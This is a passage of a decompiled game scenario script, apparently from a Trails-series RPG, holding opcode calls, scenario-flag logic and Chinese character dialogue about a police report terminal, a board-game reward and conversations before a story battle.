"loc_398"), (1, "loc_3A4"), (2, "loc_3B0"), (3, "loc_3BC"), (4, "loc_3C8"), (5, "loc_3D4"), (6, "loc_3E0"), (SWITCH_DEFAULT, "loc_3EC"), ) label("loc_398") OP_A0(0xFE, 1450, 0x0, 0xFB) Jump("loc_3F8") label("loc_3A4") OP_A0(0xFE, 1550, 0x0, 0xFB) Jump("loc_3F8") label("loc_3B0") OP_A0(0xFE, 1600, 0x0, 0xFB) Jump("loc_3F8") label("loc_3BC") OP_A0(0xFE, 1400, 0x0, 0xFB) Jump("loc_3F8") label("loc_3C8") OP_A0(0xFE, 1650, 0x0, 0xFB) Jump("loc_3F8") label("loc_3D4") OP_A0(0xFE, 1350, 0x0, 0xFB) Jump("loc_3F8") label("loc_3E0") OP_A0(0xFE, 1500, 0x0, 0xFB) Jump("loc_3F8") label("loc_3EC") OP_A0(0xFE, 1500, 0x0, 0xFB) Jump("loc_3F8") label("loc_3F8") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_40F") OP_A0(0xFE, 1500, 0x0, 0xFB) Jump("loc_3F8") label("loc_40F") Return() # Function_0_360 end def Function_1_410(): pass label("Function_1_410") SetMapFlags(0x10000) SetChrChipByIndex(0x8, 0x0) SetChrSubChip(0x8, 0x0) EndChrThread(0x8, 0x0) SetChrBattleFlags(0x8, 0x4) SetChrChipByIndex(0x9, 0x1) SetChrSubChip(0x9, 0x0) EndChrThread(0x9, 0x0) SetChrBattleFlags(0x9, 0x4) SetChrChipByIndex(0xA, 0x3) SetChrSubChip(0xA, 0x0) EndChrThread(0xA, 0x0) SetChrBattleFlags(0xA, 0x4) SetChrChipByIndex(0xB, 0x4) SetChrSubChip(0xB, 0x0) EndChrThread(0xB, 0x0) SetChrBattleFlags(0xB, 0x4) SetChrChipByIndex(0xE, 0x7) SetChrSubChip(0xE, 0x0) EndChrThread(0xE, 0x0) SetChrBattleFlags(0xE, 0x4) SetChrChipByIndex(0x12, 0x8) SetChrSubChip(0x12, 0x0) EndChrThread(0x12, 0x0) SetChrBattleFlags(0x12, 0x4) SetChrChipByIndex(0xF, 0x9) SetChrSubChip(0xF, 0x0) EndChrThread(0xF, 0x0) SetChrBattleFlags(0xF, 0x4) SetChrChipByIndex(0x10, 0xA) SetChrSubChip(0x10, 0x0) EndChrThread(0x10, 0x0) SetChrBattleFlags(0x10, 0x4) SetChrChipByIndex(0x11, 0xB) SetChrSubChip(0x11, 0x0) EndChrThread(0x11, 0x0) SetChrBattleFlags(0x11, 0x4) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4BD") SetChrFlags(0xB, 0x10) label("loc_4BD") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x22, 0)), scpexpr(EXPR_END)), "loc_4D7") ClearScenarioFlags(0x22, 0) SetScenarioFlags(0x0, 0) SetScenarioFlags(0x0, 1) Event(0, 30) Jump("loc_508") label("loc_4D7") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x22, 2)), scpexpr(EXPR_END)), "loc_4EB") ClearScenarioFlags(0x22, 2) Event(0, 29) Jump("loc_508") label("loc_4EB") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x24, 3)), scpexpr(EXPR_END)), "loc_508") ClearScenarioFlags(0x24, 3) SetChrPos(0x0, 102230, 0, -105070, 90) label("loc_508") Return() # Function_1_410 end def Function_2_509(): pass label("Function_2_509") OP_50(0x31, (scpexpr(EXPR_PUSH_LONG, 0xD0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_527") OP_50(0x1, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearScenarioFlags(0x0, 0) label("loc_527") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_END)), "loc_53B") OP_24(0x1F2) ClearScenarioFlags(0x0, 1) Jump("loc_541") label("loc_53B") Sound(498, 1, 80, 0) label("loc_541") SetMapObjFlags(0x1, 0x4) ClearMapObjFlags(0x3, 0x10) Return() # Function_2_509 end def Function_3_54E(): pass label("Function_3_54E") OP_C9(0x0, 0x4) OP_C9(0x0, 0x100) OP_E5(0xA) FadeToDark(300, 0, -1) OP_0D() OP_E5(0x5) RunExpression(0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_573") Jc((scpexpr(EXPR_GET_RESULT, 0x5), scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_6A9") RunExpression(0x5, (scpexpr(EXPR_EXEC_OP, "OP_E5(0x0)"), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Switch( (scpexpr(EXPR_GET_RESULT, 0x5), scpexpr(EXPR_END)), (0, "loc_5AC"), (1, "loc_5DB"), (2, "loc_68D"), (3, "loc_695"), (SWITCH_DEFAULT, "loc_6A4"), ) label("loc_5AC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_END)), "loc_5CB") OP_2B(0x9A, 0x9B, 0x9C, 0x96, 0x97, 0x98, 0x99, 0xFFFF) Jump("loc_5D6") label("loc_5CB") OP_2B(0x96, 0x97, 0x98, 0x99, 0xFFFF) label("loc_5D6") Jump("loc_6A4") label("loc_5DB") SetMapFlags(0x40000000) OP_E5(0x7) Sleep(500) SetChrName("自动语音") AnonymousTalk( 0xFF, "这里是克洛斯贝尔警察局。\x02", ) CloseMessageWindow() Jc((scpexpr(EXPR_EXEC_OP, "OP_E5(0x4)"), scpexpr(EXPR_END)), "loc_665") AnonymousTalk( 0xFF, "即将受理您的报告。\x02", ) CloseMessageWindow() OP_57(0x0) RunExpression(0x8, (scpexpr(EXPR_PUSH_VALUE_INDEX, 0x2F), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_E5(0xC) SetChrName("自动语音") AnonymousTalk( 0xFF, ( "报告处理完毕,\x01", "辛苦了。\x02", ) ) CloseMessageWindow() Jump("loc_67F") label("loc_665") AnonymousTalk( 0xFF, "没有可以报告的委托。\x02", ) CloseMessageWindow() label("loc_67F") OP_57(0x0) OP_E5(0x8) ClearMapFlags(0x40000000) Jump("loc_6A4") label("loc_68D") Call(0, 4) Jump("loc_6A4") label("loc_695") RunExpression(0x5, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_6A4") label("loc_6A4") Jump("loc_573") label("loc_6A9") OP_E5(0x6) OP_C9(0x1, 0x4) OP_C9(0x1, 0x100) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 4)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 5)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 7)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x29, 0)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x2A, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_6E6") OP_E5(0xB) TalkEnd(0xFF) Call(0, 5) Return() label("loc_6E6") FadeToBright(1000, 0) OP_0D() OP_E5(0xB) TalkEnd(0xFF) Return() # Function_3_54E end def Function_4_6F6(): pass label("Function_4_6F6") OP_E5(0x6) Sleep(100) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 3)), scpexpr(EXPR_END)), "loc_718") SetScenarioFlags(0x2A, 0) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A0, 0)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_718") ClearScenarioFlags(0x2A, 0) label("loc_718") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 4)), scpexpr(EXPR_END)), "loc_735") SetScenarioFlags(0x2A, 1) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x180, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A1, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_735") ClearScenarioFlags(0x2A, 1) label("loc_735") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 5)), scpexpr(EXPR_END)), "loc_752") SetScenarioFlags(0x2A, 2) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A0, 0)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_752") ClearScenarioFlags(0x2A, 2) label("loc_752") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 6)), scpexpr(EXPR_END)), "loc_76F") SetScenarioFlags(0x2A, 3) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x182, 1)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_76F") ClearScenarioFlags(0x2A, 3) label("loc_76F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 7)), scpexpr(EXPR_END)), "loc_78C") SetScenarioFlags(0x2A, 4) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A0, 0)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_78C") ClearScenarioFlags(0x2A, 4) label("loc_78C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 0)), scpexpr(EXPR_END)), "loc_7A9") SetScenarioFlags(0x2A, 5) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x182, 1)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x183, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_7A9") ClearScenarioFlags(0x2A, 5) label("loc_7A9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 1)), scpexpr(EXPR_END)), "loc_7B5") SetScenarioFlags(0x2A, 6) label("loc_7B5") OP_24(0x1F2) RunExpression(0x9, (scpexpr(EXPR_EXEC_OP, "MiniGame(0x10, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)"), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_1F() Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x1E), scpexpr(EXPR_PUSH_LONG, 0x2A), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7FA") Sound(498, 1, 50, 0) Jump("loc_800") label("loc_7FA") Sound(498, 1, 100, 0) label("loc_800") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 4)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 5)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 7)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x29, 0)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x2A, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_830") RunExpression(0x5, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_830") Return() # Function_4_6F6 end def Function_5_831(): pass label("Function_5_831") EventBegin(0x0) FadeToDark(0, 0, -1) LoadChrToIndex("chr/ch00002.itc", 0x1E) SetChrChipByIndex(0x101, 0x1E) SetChrSubChip(0x101, 0x0) SetChrFlags(0x101, 0x4) SetChrChipByIndex(0xB, 0x12) SetChrSubChip(0xB, 0x0) SetChrChipByIndex(0x8, 0x1A) SetChrSubChip(0x8, 0x0) SetChrChipByIndex(0xC, 0x1B) SetChrSubChip(0xC, 0x0) OP_4B(0xB, 0xFF) OP_4B(0x8, 0xFF) OP_4B(0xC, 0xFF) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 0)), scpexpr(EXPR_END)), "loc_89A") SetChrChipByIndex(0x9, 0x1) SetChrSubChip(0x9, 0x0) OP_4B(0x9, 0xFF) SetChrPos(0x9, 102700, 0, -102930, 180) label("loc_89A") OP_68(102970, 1000, -104740, 0) MoveCamera(40, 23, 0, 0) OP_6E(500, 0) SetCameraDistance(14560, 0) SetChrPos(0x101, 103020, 100, -105800, 90) SetChrPos(0xB, 101590, 0, -105440, 90) SetChrPos(0xC, 101470, 0, -104110, 135) SetChrPos(0x8, 103000, 0, -104100, 180) FadeToBright(1000, 0) OP_0D() ChrTalk( 0xB, ( "#00205F啊……\x02\x03", "#00204F看样子,罗伊德前辈已经\x01", "在『波波碰!』游戏中\x01", "战胜过所有对手了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#01905F哎哎,真的吗~!?\x02\x03", "#01909F不愧是罗伊德警官……\x01", "实在是太厉害了~!!\x02", ) ) CloseMessageWindow() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 0)), scpexpr(EXPR_END)), "loc_9F4") ChrTalk( 0x9, ( "#02302F嘿,的确,\x01", "你也挺有一套的嘛。\x02", ) ) CloseMessageWindow() label("loc_9F4") SetChrSubChip(0x101, 0x1) ChrTalk( 0x101, ( "#00009F哈哈,谢谢,\x01", "其实只是运气好而已……\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#12100F不,在这种脑力游戏中,\x01", "光靠运气是无法取得胜利的。\x02\x03", "#12102F班宁斯,你才是真正的\x01", "『波波碰大师』。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00012F……这、这真是过奖了。\x02", ) CloseMessageWindow() Jc((scpexpr(EXPR_EXEC_OP, "GetItemNumber(贤者, 0x4)"), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_C33") ChrTalk( 0x8, ( "#12100F哦,对了……\x02\x03", "不介意的话,就收下这个吧。\x02", ) ) CloseMessageWindow() OP_9B(0x0, 0x8, 0x0, 0x1F4, 0x5DC, 0x0) Sleep(500) SetMessageWindowPos(-1, -1, -1, -1) FadeToDark(300, 0, 100) Sound(17, 0, 100, 0) SetChrName("") AnonymousTalk( 0x3E7, ( scpstr(0x1F, 0xF0), scpstr(0x7, 0x0), "获得了。\x02", ) ) CloseMessageWindow() OP_57(0x0) FadeToBright(300, 0) AddItemNumber(贤者, 1) SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x8, ( "#12100F这是教会与爱普斯泰恩财团\x01", "以古代秘术为基础,\x01", "共同开发的禁忌核心回路。\x02\x03", "由于性能过强,很难操控,\x01", "所以一直没有正式投入运用……\x02\x03", "#12102F不过,你应该有能力控制它。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00000F嗯,明白了,\x01", "我一定会让它发挥作用的。\x02", ) ) CloseMessageWindow() Jump("loc_CFB") label("loc_C33") ChrTalk( 0x8, ( "#12100F嗯……对了。\x02\x03", "#12102F作为奖励,把这个给你吧。\x02", ) ) CloseMessageWindow() OP_9B(0x0, 0x8, 0x0, 0x1F4, 0x5DC, 0x0) SetMessageWindowPos(-1, -1, -1, -1) FadeToDark(300, 0, 100) Sound(17, 0, 100, 0) SetChrName("") AnonymousTalk( 0x3E7, ( scpstr(0x1F, 0x67), scpstr(0x7, 0x0), "获得了。\x02", ) ) CloseMessageWindow() OP_57(0x0) FadeToBright(300, 0) AddItemNumber(水耀珠, 1) SetMessageWindowPos(14, 280, 60, 3) Sleep(500) ChrTalk( 0x101, ( "#00000F哈哈,谢谢,\x01", "我一定会让它派上用场的。\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() label("loc_CFB") FadeToDark(1000, 0, -1) OP_0D() SetScenarioFlags(0x2A, 7) OP_E0(0x35, 0x0) OP_E0(0x80, 0x0) SetChrChipByIndex(0x101, 0xFF) SetChrSubChip(0x101, 0x0) ClearChrFlags(0x101, 0x4) OP_D7(0x1E) EventEnd(0x5) SetScenarioFlags(0x24, 3) NewScene("e302B", 0, 0, 0) IdleLoop() Return() # Function_5_831 end def Function_6_D2D(): pass label("Function_6_D2D") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x65), scpexpr(EXPR_PUSH_LONG, 0x14), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_DAA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_D50") Call(0, 22) Jump("loc_DA5") label("loc_D50") ChrTalk( 0x10, ( "#00102F(……待会见吧。)\x02\x03", "#00104F(迟些再来也没关系,\x01", " 请认真做好万全准备。)\x02", ) ) CloseMessageWindow() label("loc_DA5") Jump("loc_1029") label("loc_DAA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_FBE") ChrTalk( 0x10, ( "#00103F解放克洛斯贝尔市作战……\x01", "明天就要正式开始了。\x02\x03", "#00108F如果能见到贝尔和迪塔叔叔,我一定要问出\x01", "他们策动这一系列事件的真正目的……\x01", "而且还要尽力说服他们。\x02\x03", "#00101F可是,如果无法说服成功……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00008F艾莉……\x02", ) CloseMessageWindow() ChrTalk( 0x10, ( "#00106F……对不起,\x01", "忍不住说出了丧气话。\x02\x03", "#00100F为了报答那些不顾自身安危,\x01", "向我们伸出援手的人们……\x02\x03", "更为了夺回小琪雅,\x01", "我们是绝不能输的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00002F……明天一起加油吧,艾莉。\x01", "我和大家都会陪在你身边的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, ( "#00104F……呵呵,嗯。\x02\x03", "#00102F谢谢,罗伊德。\x01", "多亏你的劝慰,\x01", "我感觉轻松了一些。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 5) Jump("loc_1029") label("loc_FBE") ChrTalk( 0x10, ( "#00104F谢谢,罗伊德。\x01", "多亏你的劝慰,\x01", "我感觉轻松了一些。\x02\x03", "#00102F今天就早点休息……\x01", "为明天做好准备吧。\x02", ) ) CloseMessageWindow() label("loc_1029") TalkEnd(0xFE) Return() # Function_6_D2D end def Function_7_102D(): pass label("Function_7_102D") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x66), scpexpr(EXPR_PUSH_LONG, 0x14), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_10B3") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1050") Call(0, 23) Jump("loc_10AE") label("loc_1050") ChrTalk( 0xB, ( "#00204F把手头的事情做完以后,\x01", "我就会去甲板的。\x02\x03", "#00202F要谈的事情……\x01", "就等到那时再说吧。\x02", ) ) CloseMessageWindow() label("loc_10AE") Jump("loc_151E") label("loc_10B3") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1498") ChrTalk( 0xB, ( "#00203F(快速敲击键盘……)\x02\x03", "#00200F嗯,这样就准备得差不多了吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00005F缇欧……\x01", "你在做什么呢?\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x26, 0x26, 0xFA, 0x1) Sleep(1000) OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xB, 0x10) TurnDirection(0xB, 0x101, 0) OP_52(0xB, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_11CD") Jump("loc_1217") label("loc_11CD") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_11ED") OP_52(0xB, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1217") label("loc_11ED") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_120D") OP_52(0xB, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1217") label("loc_120D") OP_52(0xB, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_1217") OP_52(0xB, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0xB, 0x10) ChrTalk( 0xB, ( "#00202F为了明天的突入行动,\x01", "我正在对梅尔卡瓦的系统\x01", "做最终检查。\x02\x03", "#00203F我到时也会离开梅尔卡瓦,\x01", "和大家一起作战……\x02\x03", "#00200F所以控制通讯终端之后的网络侵入\x01", "工作要交给约纳和芙兰来处理,\x01", "现在就要完成交接。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00001F这样啊……\x01", "真是辛苦你了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#00204F没什么,马上就要\x01", "处理完了,不必担心。\x02\x03", "#00202F罗伊德前辈只要摆出一副\x01", "队长的架势,威严地站在边上\x01", "看着就可以了。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#00006F那可不行啊,为了明天的作战,\x01", "还有好多事情需要准备呢。\x02\x03", "#00000F既然你这么有干劲,\x01", "这里就全部交给你了。\x02\x03", "缇欧,你们要\x01", "注意休息哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#00204F嗯,知道了,\x01", "罗伊德前辈也要好好休息。\x02", ) ) CloseMessageWindow() SetChrSubChip(0xB, 0x0) SetScenarioFlags(0x1DA, 6) ClearChrFlags(0xB, 0x10) Jump("loc_151E") label("loc_1498") ChrTalk( 0xB, ( "#00204F为了明天的突入行动,\x01", "我正在对梅尔卡瓦的系统\x01", "做最终检查。\x02\x03", "#00202F检查完毕之后,\x01", "我就会去休息了。\x01", "罗伊德前辈也要好好休息。\x02", ) ) CloseMessageWindow() label("loc_151E") TalkEnd(0xFE) Return() # Function_7_102D end def Function_8_1522(): pass label("Function_8_1522") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x67), scpexpr(EXPR_PUSH_LONG, 0x12), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_1597") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1545") Call(0, 24) Jump("loc_1592") label("loc_1545") ChrTalk( 0xE, ( "#00304F那我们稍后见吧。\x02\x03", "#00302F等我检修完这东西之后,\x01", "马上就会过去的。\x02", ) ) CloseMessageWindow() label("loc_1592") Jump("loc_1845") label("loc_1597") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_17D5") ChrTalk( 0xE, "#00300F哟,罗伊德。\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#00000F兰迪,你们正在\x01", "检修武器吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#00302F嗯,毕竟明天的作战可以算是\x01", "我们至今为止要面对的最大难关。\x02\x03", "#00304F有可能会用到『狂战士』,\x01", "为了预防万一,现在必须要\x01", "认真做好准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00005F唔,至今为止总是很忙,\x01", "一直都没时间维护武器……\x02\x03", "#00003F我是不是也应该趁着今晚,\x01", "好好检查一下旋棍呢?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#00309F嗯,还是检查一下吧。\x02\x03", "#00303F虽说你的武器和来复枪不同,\x01", "不需要特别检修\x01", "精密部件……\x02\x03", "#00300F但就算只是擦拭一下,\x01", "手感也会有很大改善。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00005F原、原来如此……\x01", "也许正如你所说呢。\x02\x03", "#00002F多谢指点,我稍后\x01", "也去检查一下。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 7) Jump("loc_1845") label("loc_17D5") ChrTalk( 0xE, ( "#00304F你最好也在明天之前,\x01", "把武器认真检修一番。\x02\x03", "#00309F一定要像对待绝世美女那样,\x01", "小心翼翼地温柔处理哦。\x02", ) ) CloseMessageWindow() label("loc_1845") TalkEnd(0xFE) Return() # Function_8_1522 end def Function_9_1849(): pass label("Function_9_1849") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x68), scpexpr(EXPR_PUSH_LONG, 0x16), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_18EF") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_186C") 